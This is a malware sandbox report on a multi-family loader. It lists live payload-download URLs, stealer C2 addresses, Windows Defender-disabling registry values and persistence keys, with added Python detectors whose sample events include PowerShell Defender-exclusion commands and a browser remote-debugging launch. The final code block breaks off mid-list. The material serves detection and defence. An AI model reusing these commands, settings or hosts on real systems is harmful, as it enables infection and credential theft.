Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted
29/03/2025, 12:51
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
5ec95a42b16d80c72d17cc6d0bac58de
-
SHA1
9cfd9221606e1acfef1ea5f6f4bf88080822d5db
-
SHA256
f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
-
SHA512
ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b
-
SSDEEP
24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
(this download URL was extracted three times in this run)
Extracted
Family
amadey
Version
5.21
Botnet
092155
C2
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
Family
vidar
Version
13.3
Botnet
11373d37b176b52c098f600f61cdf190
C2
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
(the t.me and steamcommunity.com entries are dead-drop resolver pages from which Vidar reads its real C2 address; they are not the C2 itself and should be matched on the exact path, not the host)
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
Family
lumma
C2
https://wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://xcastmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://advennture.top/GKsiio
https://7targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://castmaxw.run/ganzde
https://fferromny.digital/gwpd
Extracted
Family
stealc
Botnet
trump
C2
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
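The extracted configurations above give three kinds of network indicator: attacker-controlled hosts (the 176.113.115.x and 45.93.20.28 addresses and the Lumma domains), and two pages on shared platforms (t.me, steamcommunity.com) that Vidar reads to find its real C2. The Python below is an added example, not part of the sandbox report, that turns the list into a matcher which alerts on the hosts but only on the exact paths for the shared platforms, and runs it over constructed proxy-log lines. The log layout, the client IPs and the log lines are assumptions for illustration; only part of the Lumma domain list is reproduced.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from the "Malware Config" section of this report.
# Only a subset of the Lumma C2 list is reproduced here.
EXTRACTED_URLS = [
    "http://176.113.115.7/mine/random.exe",                    # stage-2 download
    "http://176.113.115.6/Ni9kiput/index.php",                 # amadey C2 + url_paths
    "https://t.me/lw25chm",                                    # vidar dead-drop resolvers
    "https://steamcommunity.com/profiles/76561199839170361",
    "https://wxayfarer.live/ALosnz",                           # lumma (subset)
    "https://oreheatq.live/gsopp",
    "https://xcastmaxw.run/ganzde",
    "https://castmaxw.run/ganzde",
    "http://45.93.20.28/85a1cacf11314eb8.php",                 # stealc C2 + url_path
]

# Legitimate platforms the malware only abuses as dead drops; matching on the
# host alone would flag every Telegram and Steam request on the network.
SHARED_HOSTS = {"t.me", "steamcommunity.com"}


def build_indicators(urls):
    """Split indicators into host-level (attacker infrastructure) and
    path-level (specific pages on shared platforms)."""
    host_iocs, path_iocs = set(), set()
    for url in urls:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host in SHARED_HOSTS:
            path_iocs.add((host, parts.path))
        else:
            host_iocs.add(host)
    return host_iocs, path_iocs


HOST_IOCS, PATH_IOCS = build_indicators(EXTRACTED_URLS)

# Assumed log layout: "<timestamp> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def match_url(url):
    """Return ("host"|"path", indicator) for a hit, or None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in HOST_IOCS:
        return ("host", host)
    if (host, parts.path) in PATH_IOCS:
        return ("path", host + parts.path)
    return None


def scan_log(lines):
    """Return [(line number, client ip, kind, indicator)] for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        verdict = match_url(m.group(4))
        if verdict:
            hits.append((n, m.group(2), verdict[0], verdict[1]))
    return hits


# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = """\
2025-03-29T12:52:01Z 10.0.0.5 GET http://176.113.115.7/mine/random.exe 200
2025-03-29T12:52:09Z 10.0.0.5 POST http://176.113.115.6/Ni9kiput/index.php?id=1 200
2025-03-29T12:52:20Z 10.0.0.5 GET https://steamcommunity.com/profiles/76561199839170361 200
2025-03-29T12:52:21Z 10.0.0.9 GET https://steamcommunity.com/app/730 200
2025-03-29T12:52:30Z 10.0.0.5 GET https://t.me/lw25chm 200
2025-03-29T12:52:31Z 10.0.0.9 GET https://t.me/somepublicchannel 200
2025-03-29T12:52:40Z 10.0.0.5 POST https://castmaxw.run/api 200
2025-03-29T12:52:41Z 10.0.0.9 GET https://example.com/ 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d client %s matched %s indicator %s" % hit)
```

The Lumma hosts match on any path, because the report shows the same host reused with different paths (castmaxw.run and xcastmaxw.run both serve /ganzde); the Steam and Telegram entries match only the profile and channel paths from the config, so ordinary traffic to those platforms from other clients is not flagged.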
Signatures
-
Amadey family
-
Detect Vidar Stealer 17 IoCs
resource | yara_rule
behavioral2/memory/3648-{237,236,254,255,260,261,264,287,288,295,299,303,990,1037,1038,1148,1144}-0x0000000000400000-0x0000000000429000-memory.dmp | family_vidar_v7
All 17 hits are dumps of the same 0x400000-0x429000 image region of pid 3648, the process that hYjiwV0.exe (pid 4772) targeted with SetThreadContext (see "Suspicious use of SetThreadContext" below).
Detects Healer an antivirus disabler dropper 3 IoCs
resource | yara_rule
behavioral2/memory/3564-{21694,21704,22050}-0x00000000009E0000-0x0000000000E20000-memory.dmp | healer
pid 3564 is c96dd9ec4b.exe (see "Executes dropped EXE"), the same process that writes the Windows Defender registry values below.
Gcleaner family
-
Healer family
-
Lumma family
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | c96dd9ec4b.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | c96dd9ec4b.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | c96dd9ec4b.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | c96dd9ec4b.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | c96dd9ec4b.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | c96dd9ec4b.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | c96dd9ec4b.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | c96dd9ec4b.exe
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | c96dd9ec4b.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | c96dd9ec4b.exe
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 2432 created 2956 | 2432 | MSBuild.exe | 50
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE, 483d2fa8a0d53818306efeb32d3.exe, c96dd9ec4b.exe, f4619e3a66.exe, TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE, rapes.exe (4 instances), c4f793a08b.exe, 5c08298338.exe, c606d285b9.exe, 02a203a317.exe, e6e32e2403.exe, 04c5e61d92.exe, cdf48d376b.exe
The same 16 process instances appear under "Checks BIOS information in registry", "Identifies Wine through registry keys" and "Suspicious use of NtSetInformationThreadHideFromDebugger" below, which points to one shared loader/packer stub performing these checks (rapes.exe is the Amadey install_file from the extracted config) rather than per-payload anti-VM logic.
Blocklisted process makes network request 3 IoCs
flow | pid | Process
16 | 3760 | powershell.exe
196 | 5824 | powershell.exe
200 | 1676 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Runs PowerShell to modify Windows Defender settings and add exclusions for file extensions, paths, and processes.
pid | Process
5580 | powershell.exe
13268 | powershell.exe
7056 | powershell.exe
6072 | powershell.exe
5824 | powershell.exe
1676 | powershell.exe
3760 | powershell.exe
Downloads MZ/PE file 14 IoCs
flow | pid | Process
38 | 668 | rapes.exe (6 PE downloads on this flow)
40 | 4192 | futors.exe
604 | 10612 | e6e32e2403.exe (3 PE downloads on this flow)
16 | 3760 | powershell.exe
35 | 668 | rapes.exe
136 | 668 | rapes.exe
143 | 4904 | svchost.exe
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File created | C:\Windows\System32\Drivers\9e186137.sys | 46e716e8.exe
File created | C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys | 46e716e8.exe
File created | C:\Windows\System32\Drivers\klupd_9e186137a_klbg.sys | 46e716e8.exe
Sets service image path in registry 2 TTPs 6 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_mark\ImagePath = "System32\\Drivers\\klupd_9e186137a_mark.sys" | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_9e186137a_arkmon.sys" | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\\Drivers\\9e186137.sys" | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\\Drivers\\klupd_9e186137a_arkmon.sys" | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_klbg\ImagePath = "System32\\Drivers\\klupd_9e186137a_klbg.sys" | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_klark\ImagePath = "System32\\Drivers\\klupd_9e186137a_klark.sys" | 46e716e8.exe
The KVRT2020_Data directory and the klupd_/klbg/klark driver names follow Kaspersky Virus Removal Tool naming, so the driver installs, SafeBoot entry, raw-disk open and 26 DLL loads attributed to 46e716e8.exe are consistent with a bundled AV removal tool being run rather than a custom kernel implant. That is an inference from names only; hash the dropped drivers and check their signatures before accepting it.
Uses browser remote debugging 2 TTPs 16 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid | Process
6132 | chrome.exe
440 | msedge.exe
7288 | chrome.exe
9460 | chrome.exe
12944 | msedge.exe
5104 | chrome.exe
1760 | chrome.exe
4720 | chrome.exe
7328 | chrome.exe
8312 | chrome.exe
13232 | msedge.exe
4024 | chrome.exe
6104 | msedge.exe
12256 | chrome.exe
13024 | msedge.exe
5864 | msedge.exe
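The rows above list the browser processes themselves; what identifies the abuse is the command line each browser was started with and the parent that started it, and the PowerShell rows under "Command and Scripting Interpreter" are the Add-MpPreference exclusions the description mentions. The Python below is an added example, not from the report, of a process-creation detector for both. The event layout mirrors Sysmon Event ID 1 field names, the command lines are constructed (the report records PIDs only), and the parent path of the first event reuses the e6e32e2403.exe drop path from the Run-key rows as an assumed parent.

```python
import base64
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}
# Switches that expose the DevTools protocol, i.e. hand over the session.
DEBUG_SWITCHES = ("--remote-debugging-port", "--remote-debugging-pipe")
# Extras that stealers typically combine with it: invisible window, and the
# real profile directory so the saved cookies/credentials are loaded.
SUSPICIOUS_EXTRAS = ("--headless", "--user-data-dir=", "--restore-last-session")
EXCLUSION_RE = re.compile(r"add-mppreference[^|;&]*?-exclusion(?:path|process|extension)")
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmd):
    """Append the decoded payload of a powershell -EncodedCommand argument so
    the string rules also see base64-wrapped commands (UTF-16LE by convention)."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd


def detect(event):
    """Return [(rule, severity, details)] for one process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = expand_encoded(event["CommandLine"]).lower()
    findings = []
    if image in BROWSERS and any(s in cmd for s in DEBUG_SWITCHES):
        # A browser started by a browser or the shell may be a developer using
        # DevTools; a dropped EXE, script host or PowerShell parent is not.
        severity = "medium" if parent in BROWSERS or parent == "explorer.exe" else "high"
        details = [s for s in SUSPICIOUS_EXTRAS if s in cmd]
        findings.append(("browser_remote_debugging", severity, details))
    if image in ("powershell.exe", "pwsh.exe"):
        m = EXCLUSION_RE.search(cmd)
        if m:
            findings.append(("defender_exclusion_added", "high", [m.group(0)]))
    return findings


# Constructed sample events (field names follow Sysmon Event ID 1).
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionExtension exe".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\10369230101\e6e32e2403.exe",
     "CommandLine": r'chrome.exe --remote-debugging-port=9222 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data"'},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"msedge.exe" --profile-directory=Default'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp" -ExclusionProcess rapes.exe'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + ENCODED},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["Image"]), detect(ev))
```

The exclusion rule only sees what is in the command line; a script file or a download-and-invoke pattern (the "Blocklisted process makes network request" rows above show powershell.exe fetching PE files) needs script-block logging (Event ID 4104) rather than process creation to catch the Add-MpPreference call.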
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | c606d285b9.exe, 04c5e61d92.exe, 02a203a317.exe, rapes.exe (4 instances), Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE, f4619e3a66.exe, 5c08298338.exe, TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE, 483d2fa8a0d53818306efeb32d3.exe, cdf48d376b.exe, e6e32e2403.exe, c96dd9ec4b.exe, c4f793a08b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe (4 instances), TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE, 483d2fa8a0d53818306efeb32d3.exe, c606d285b9.exe, f4619e3a66.exe, 5c08298338.exe, c96dd9ec4b.exe, Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE, 02a203a317.exe, cdf48d376b.exe, c4f793a08b.exe, 04c5e61d92.exe, e6e32e2403.exe
(each of the 16 process instances queries both values)
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation | futors.exe, mshta.exe (3 instances), rapes.exe, amnew.exe, 7IIl2eE.exe, Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE
Deletes itself 1 IoCs
pid | Process
3632 | w32tm.exe
(pid 3632 is the dropped w32tm.exe listed under "Executes dropped EXE" below, not the system binary in System32)
Executes dropped EXE 39 IoCs
pid | Process
1896 | Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE
668 | rapes.exe
4244 | amnew.exe
4192 | futors.exe
5900 | f4619e3a66.exe
1572 | 5c08298338.exe
4168 | rapes.exe
6040 | futors.exe
4396 | Rm3cVPI.exe
1944 | svchost015.exe
3628 | svchost015.exe
5096 | c606d285b9.exe
5568 | 04c5e61d92.exe
4400 | svchost015.exe
2816 | TbV75ZR.exe
4772 | hYjiwV0.exe
2904 | EPTwCQd.exe
1000 | 7IIl2eE.exe
4856 | Passwords.com
5008 | u75a1_003.exe
3632 | w32tm.exe
5312 | tzutil.exe
5724 | 62b36023a0.exe
7420 | TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE
7476 | 483d2fa8a0d53818306efeb32d3.exe
6168 | 627d431241.exe
8184 | rapes.exe
3164 | futors.exe
9172 | 02a203a317.exe
10056 | cdf48d376b.exe
10612 | e6e32e2403.exe
10984 | b2e2ac1.exe
11784 | 46e716e8.exe
9620 | 1204b818ae.exe
3564 | c96dd9ec4b.exe
9476 | c4f793a08b.exe
8804 | svchost015.exe
11636 | rapes.exe
11680 | futors.exe
Identifies Wine through registry keys 2 TTPs 16 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine | cdf48d376b.exe, e6e32e2403.exe, c96dd9ec4b.exe, rapes.exe (4 instances), 5c08298338.exe, TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE, f4619e3a66.exe, c4f793a08b.exe, 02a203a317.exe, Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE, c606d285b9.exe, 04c5e61d92.exe, 483d2fa8a0d53818306efeb32d3.exe
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver" | 46e716e8.exe
Loads dropped DLL 26 IoCs
pid | Process
11784 | 46e716e8.exe (all 26 DLL loads are by this one process)
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | c96dd9ec4b.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | c96dd9ec4b.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\04c5e61d92.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043960101\\04c5e61d92.exe" | futors.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\62b36023a0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369180101\\62b36023a0.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cdf48d376b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369220101\\cdf48d376b.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e6e32e2403.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369230101\\e6e32e2403.exe" | rapes.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\37f4cc3d-f27b-420b-957e-f6d811ab123d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{3c976390-0aa9-4094-8a98-6f7106a2b202}\\37f4cc3d-f27b-420b-957e-f6d811ab123d.cmd\"" | 46e716e8.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369190121\\am_no.cmd" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1204b818ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369240101\\1204b818ae.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c96dd9ec4b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369250101\\c96dd9ec4b.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c08298338.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043950101\\5c08298338.exe" | futors.exe
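The registry rows in this report fall into a few patterns worth turning into rules: Defender policy values flipped to 1 and TamperProtection flipped to 0 (the c96dd9ec4b.exe rows under "Modifies Windows Defender ..." and "Windows security modification"), Run/RunOnce values pointing into AppData\Local\Temp or ProgramData (the rows directly above), a service ImagePath outside the Windows directory, and a new SafeBoot\Minimal entry (the 46e716e8.exe rows). The Python below is an added example, not part of the report, that normalises the report's native \REGISTRY\... paths (collapsing the WOW6432Node view so one rule covers both the 32-bit and 64-bit views) and evaluates those rules; the input rows are copied from this report, plus one constructed benign OneDrive Run value as a control.

```python
import re

# Defender policy values that switch a component off when set to 1
# (value names taken from the policy paths in this report).
DEFENDER_DISABLE = re.compile(
    r"^hklm\\software\\policies\\microsoft\\windows defender\\"
    r"(?:real-time protection\\)?"
    r"(disableantispyware|disablerealtimemonitoring|disablebehaviormonitoring|"
    r"disableioavprotection|disableonaccessprotection|disablescanonrealtimeenable)$")
# Other Defender settings, with the data value that indicates tampering.
DEFENDER_OTHER = {
    "hklm\\software\\policies\\microsoft\\windows defender security center"
    "\\notifications\\disablenotifications": "1",
    "hklm\\software\\microsoft\\windows defender\\features\\tamperprotection": "0",
}
RUN_KEY = re.compile(r"^(?:hklm|hkcu)\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\programdata\\", "\\users\\public\\")
SERVICE_IMAGE = re.compile(
    r"^hklm\\system\\(?:currentcontrolset|controlset\d+)\\services\\[^\\]+\\imagepath$")
SAFEBOOT = re.compile(
    r"^hklm\\system\\(?:currentcontrolset|controlset\d+)\\control\\safeboot\\(?:minimal|network)\\")
WINDOWS_DRIVER_PREFIXES = ("system32\\", "\\systemroot\\", "c:\\windows\\")


def normalize(path):
    """Native \\REGISTRY\\... path -> lower-case HKLM/HKCU form with the
    WOW6432Node (32-bit redirected) view collapsed into the native view."""
    p = path
    for native, short in (("\\REGISTRY\\MACHINE\\", "HKLM\\"), ("\\REGISTRY\\USER\\", "HKU\\")):
        if p.upper().startswith(native):
            p = short + p[len(native):]
    p = p.lower().replace("\\wow6432node\\", "\\")
    # Collapse the per-user hive of any SID to HKCU.
    return re.sub(r"^hku\\s-1-5-21-[\d-]+\\", lambda m: "hkcu\\", p)


def evaluate(event, path, value):
    """Return [(rule, detail), ...] for one registry event.  value is the
    string form of the data written (None for key creation)."""
    p = normalize(path)
    v = (value or "").lower()
    hits = []
    m = DEFENDER_DISABLE.match(p)
    if m and v == "1":
        hits.append(("defender_disabled_by_policy", m.group(1)))
    if p in DEFENDER_OTHER and v == DEFENDER_OTHER[p]:
        hits.append(("defender_setting_tampered", p.rsplit("\\", 1)[-1]))
    if RUN_KEY.match(p) and any(d in v for d in USER_WRITABLE):
        hits.append(("run_key_to_user_writable_path", p.rsplit("\\", 1)[-1]))
    if SERVICE_IMAGE.match(p):
        image = v.replace("\\??\\", "").strip('"')
        if not image.startswith(WINDOWS_DRIVER_PREFIXES):
            hits.append(("service_image_outside_windows", image))
    m = SAFEBOOT.match(p)
    if m:
        hits.append(("safeboot_minimal_entry", p[m.end():].split("\\")[0]))
    return hits


def scan(rows):
    """rows: (event, path, value, process) tuples -> [(process, rule, detail)]."""
    return [(proc, rule, detail)
            for event, path, value, proc in rows
            for rule, detail in evaluate(event, path, value)]


# (event, path, value, process) copied from this report's IoC rows; the last
# row is a constructed benign control and is not from the report.
REPORT_ROWS = [
    ("SetValue", r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "1", "c96dd9ec4b.exe"),
    ("SetValue", r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "1", "c96dd9ec4b.exe"),
    ("SetValue", r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection", "0", "c96dd9ec4b.exe"),
    ("SetValue", r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications", "1", "c96dd9ec4b.exe"),
    ("SetValue", r"\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c96dd9ec4b.exe", r"C:\Users\Admin\AppData\Local\Temp\10369250101\c96dd9ec4b.exe", "rapes.exe"),
    ("SetValue", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}", r"C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}", "svchost.exe"),
    ("SetValue", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon_7C924DD4\ImagePath", r"\??\C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_9e186137a_arkmon.sys", "46e716e8.exe"),
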